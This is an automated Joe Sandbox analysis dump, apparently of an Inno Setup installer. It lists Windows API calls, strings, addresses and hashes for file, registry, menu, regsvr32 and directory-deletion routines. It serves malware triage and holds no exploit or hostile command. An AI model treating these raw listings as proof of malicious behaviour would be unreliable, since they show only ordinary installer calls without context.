                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                          • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                          Similarity
                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                          • String ID:
                                                                          • API String ID: 1694776339-0
                                                                          APIs
                                                                          • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                                          • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                                          • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                                          • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                                          • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                                          • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                                          • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                                          • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                                          Similarity
                                                                          • API ID: Menu$Delete$EnableItem$System
                                                                          • String ID:
                                                                          • API String ID: 3985193851-0
                                                                          APIs
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: PrivateProfileStringWrite
                                                                          • String ID: $pI$.tmp$MoveFileEx$NUL$WININIT.INI$[rename]$oI
                                                                          • API String ID: 390214022-3415521383
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(10000000), ref: 0047FFC4
                                                                          • FreeLibrary.KERNEL32(02300000), ref: 0047FFD8
                                                                          • SendNotifyMessageA.USER32(00020464,00000496,00002710,00000000), ref: 0048004A
                                                                          Strings
                                                                          • Not restarting Windows because Setup is being run from the debugger., xrefs: 0047FFF9
                                                                          • GetCustomSetupExitCode, xrefs: 0047FE79
                                                                          • DeinitializeSetup, xrefs: 0047FED5
                                                                          • Deinitializing Setup., xrefs: 0047FE3A
                                                                          • Restarting Windows., xrefs: 00480025
                                                                          Similarity
                                                                          • API ID: FreeLibrary$MessageNotifySend
                                                                          • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                          • API String ID: 3817813901-1884538726
                                                                          APIs
                                                                          • SHGetMalloc.SHELL32(?), ref: 00460DEF
                                                                          • GetActiveWindow.USER32 ref: 00460E53
                                                                          • CoInitialize.OLE32(00000000), ref: 00460E67
                                                                          • SHBrowseForFolder.SHELL32(?), ref: 00460E7E
                                                                          • CoUninitialize.OLE32(00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460E93
                                                                          • SetActiveWindow.USER32(?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EA9
                                                                          • SetActiveWindow.USER32(?,?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EB2
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                          • String ID: A
                                                                          • API String ID: 2684663990-3554254475
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5,?,?,00000000,00471F1C), ref: 004719BC
                                                                            • Part of subcall function 0042CD60: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CDD6
                                                                            • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5), ref: 00471A33
                                                                          • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000), ref: 00471A39
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                          • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                          • API String ID: 884541143-1710247218
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(02300000,inflateInit_), ref: 0045C9DD
                                                                          • GetProcAddress.KERNEL32(02300000,inflate), ref: 0045C9ED
                                                                          • GetProcAddress.KERNEL32(02300000,inflateEnd), ref: 0045C9FD
                                                                          • GetProcAddress.KERNEL32(02300000,inflateReset), ref: 0045CA0D
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                          • API String ID: 190572456-3516654456
APIs
• SetBkColor.GDI32(?,00000000), ref: 0041A9C9
• 73A14D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
• SetBkColor.GDI32(?,?), ref: 0041AA18
• StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
• SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
• SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
• StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
• SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
• SetBkColor.GDI32(00000000,?), ref: 0041AAD3
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: Color$StretchText
• String ID:
• API String ID: 2984075790-0
• Opcode ID: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
• Instruction ID: 2bdc14f7f78cb6bf094045e191087cf2cdbf471e5afceb3518b79a0be2d35765
• Opcode Fuzzy Hash: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
• Instruction Fuzzy Hash: 4E61E5B5A00105EFCB40EFADD985E9AB7F8AF08354B10816AF508DB261CB34ED44CF68
APIs
  • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00457470,?, /s ",?,regsvr32.exe",?,00457470), ref: 004573E2
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: CloseDirectoryHandleSystem
• String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
• API String ID: 2051275411-1862435767
• Opcode ID: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
• Instruction ID: cb1a7ae3e697987e935249ccafc7b98f7c309c2d79f12e82178ec20c33fcefbe
• Opcode Fuzzy Hash: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
• Instruction Fuzzy Hash: 73410670A043086BDB10EFD5D841B9DBBF9AF45305F50407BA918BB292D7789A09CB59
APIs
• OffsetRect.USER32(?,00000001,00000001), ref: 0044C9FD
• GetSysColor.USER32(00000014), ref: 0044CA04
• SetTextColor.GDI32(00000000,00000000), ref: 0044CA1C
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA45
• OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA4F
• GetSysColor.USER32(00000010), ref: 0044CA56
• SetTextColor.GDI32(00000000,00000000), ref: 0044CA6E
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA97
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAC2
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: Text$Color$Draw$OffsetRect
• String ID:
• API String ID: 1005981011-0
• Opcode ID: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
• Instruction ID: cbf23e484866fe7d62e86adeccfbc8e31d2d10e105370748ca703b53abdb5865
• Opcode Fuzzy Hash: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
• Instruction Fuzzy Hash: 6821EFB42015047FC710FB2ACC8AE8B7BDCDF19319B01457A7918EB393C678DD408669
APIs
  • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
• GetWindowThreadProcessId.USER32(00000000,?), ref: 004949E1
• OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 004949F5
• SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00494A0F
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A1B
• CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A21
• Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A34
Strings
• Deleting Uninstall data files., xrefs: 00494957
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
• String ID: Deleting Uninstall data files.
• API String ID: 1570157960-2568741658
• Opcode ID: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
• Instruction ID: d482532eb754b17a04c62f956e406d56ab6d113e5f4ee6e28585aa8da354e785
• Opcode Fuzzy Hash: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
• Instruction Fuzzy Hash: 0E219170344204AEEB10EBBAFD42F1737A8D799718F10003BB5049A2E3D67C9C059B6D
APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
• RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD,?,?,?,?,00000000), ref: 0046F247
• RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD), ref: 0046F25E
• AddFontResourceA.GDI32(00000000), ref: 0046F27B
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046F28F
Strings
• AddFontResource, xrefs: 0046F299
• Failed to open Fonts registry key., xrefs: 0046F265
• Failed to set value in Fonts registry key., xrefs: 0046F250
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: CloseFontMessageNotifyOpenResourceSendValue
• String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
• API String ID: 955540645-649663873
• Opcode ID: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
• Instruction ID: 6d7729dfe4f1a7c8b63a61044efa00ce4130ce7f95034744da23bbcbb22f00e6
• Opcode Fuzzy Hash: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
• Instruction Fuzzy Hash: CC21B278B402007BDB10EBA6AC52F5E779CDB45704F604077B940EB3C2EA7D9D098A6E
APIs
  • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
  • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
  • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
• GetVersion.KERNEL32 ref: 00462588
• SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 004625C6
• SHGetFileInfo.SHELL32(00462664,00000000,?,00000160,00004011), ref: 004625E3
• LoadCursorA.USER32(00000000,00007F02), ref: 00462601
• SetCursor.USER32(00000000,00000000,00007F02,00462664,00000000,?,00000160,00004011), ref: 00462607
• SetCursor.USER32(?,00462647,00007F02,00462664,00000000,?,00000160,00004011), ref: 0046263A
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
• String ID: Explorer
• API String ID: 2594429197-512347832
• Opcode ID: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
• Instruction ID: 5d8862978945b954f1aea40d900f189da683ff410d790468fedd90432f5e16a2
• Opcode Fuzzy Hash: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
• Instruction Fuzzy Hash: DE21E7707407047AE725BB798D47F9A76D89B08708F50407FB605EA1C3E9BD8C1486AE
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02332BDC,?,?,?,02332BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
• GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02332BDC,?,?,?,02332BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
• CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02332BDC,?,?,?,02332BDC), ref: 00476E74
• CloseHandle.KERNEL32(00000000,?,?,?,02332BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: FileHandle$AddressAttributesCloseCreateModuleProc
• String ID: GetFinalPathNameByHandleA$kernel32.dll
• API String ID: 2704155762-2318956294
• Opcode ID: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
• Instruction ID: d2756be845a9a7cec8c09e5f4573334ab46b2fb936870a4cb364c11667d86bc7
• Opcode Fuzzy Hash: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
• Instruction Fuzzy Hash: E301D654340F0436EA30317A8C86FBB644E8B40769F158137BA1CEA2D2DAAC8D15127E
APIs
• RtlEnterCriticalSection.KERNEL32(0049A420,00000000,00401B68), ref: 00401ABD
• LocalFree.KERNEL32(006A37C0,00000000,00401B68), ref: 00401ACF
• VirtualFree.KERNEL32(?,00000000,00008000,006A37C0,00000000,00401B68), ref: 00401AEE
• LocalFree.KERNEL32(006A47C0,?,00000000,00008000,006A37C0,00000000,00401B68), ref: 00401B2D
• RtlLeaveCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B58
• RtlDeleteCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B62
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
• String ID: Mj
• API String ID: 3782394904-209792402
• Opcode ID: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
• Instruction ID: 4ef907ce7de5879ae286245a644ba6b68361dc01c28fd2a698a6758b772d8c96
• Opcode Fuzzy Hash: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
• Instruction Fuzzy Hash: C9114270A403405AEB15AB659C89B263BE597A570CF54407BF80067AF2D7BC5860C7EF
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,004596AE,?,00000000,00000000,00000000,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 004595F2
                                                                            • Part of subcall function 00453910: FindClose.KERNEL32(000000FF,00453A06), ref: 004539F5
                                                                          Strings
                                                                          • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459667
                                                                          • Failed to delete directory (%d). Will retry later., xrefs: 0045960B
                                                                          • Failed to strip read-only attribute., xrefs: 004595C0
                                                                          • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004595CC
                                                                          • Stripped read-only attribute., xrefs: 004595B4
                                                                          • Failed to delete directory (%d)., xrefs: 00459688
                                                                          • Deleting directory: %s, xrefs: 0045957B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseErrorFindLast
                                                                          • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                          • API String ID: 754982922-1448842058
                                                                          • Opcode ID: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
                                                                          • Instruction ID: 65fff70db6fa7d9e45c4e30736062023b7b7828f3df3317cc7ecb80ce87614ba
                                                                          • Opcode Fuzzy Hash: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
                                                                          • Instruction Fuzzy Hash: 7841A330A04209DBCB11DB6AC8013AE76A55F49306F55857FAC0197393DB7C8E0D876E
                                                                          APIs
                                                                          • GetCapture.USER32 ref: 00422EB4
                                                                          • GetCapture.USER32 ref: 00422EC3
                                                                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                          • ReleaseCapture.USER32 ref: 00422ECE
                                                                          • GetActiveWindow.USER32 ref: 00422EDD
                                                                          • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                                          • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                          • GetActiveWindow.USER32 ref: 00422FCF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                          • String ID:
                                                                          • API String ID: 862346643-0
                                                                          • Opcode ID: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
                                                                          • Instruction ID: db8aa600a50c93bece591f99e5806f4c3f5e9428d1b568cd9ed9aa9c7d903083
                                                                          • Opcode Fuzzy Hash: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
                                                                          • Instruction Fuzzy Hash: 0A413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF540AB392DB789E40DB5D
                                                                          APIs
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 0042F12E
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0042F145
                                                                          • GetActiveWindow.USER32 ref: 0042F14E
                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F17B
                                                                          • SetActiveWindow.USER32(?,0042F2AB,00000000,?), ref: 0042F19C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveLong$Message
                                                                          • String ID:
                                                                          • API String ID: 2785966331-0
                                                                          • Opcode ID: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
                                                                          • Instruction ID: 66ba457b2775015b13cc3341b2fd0efd1cc0de66d5492798f2afbbc1fd9aa33e
                                                                          • Opcode Fuzzy Hash: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
                                                                          • Instruction Fuzzy Hash: 7B31B474A00654EFDB01EFB6DC52D6EBBB8EB09714F9144BAF804E3291D6399D10CB68
                                                                          APIs
                                                                          • 73A0A570.USER32(00000000), ref: 0042949A
                                                                          • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                            • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                          • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                          • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                          • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
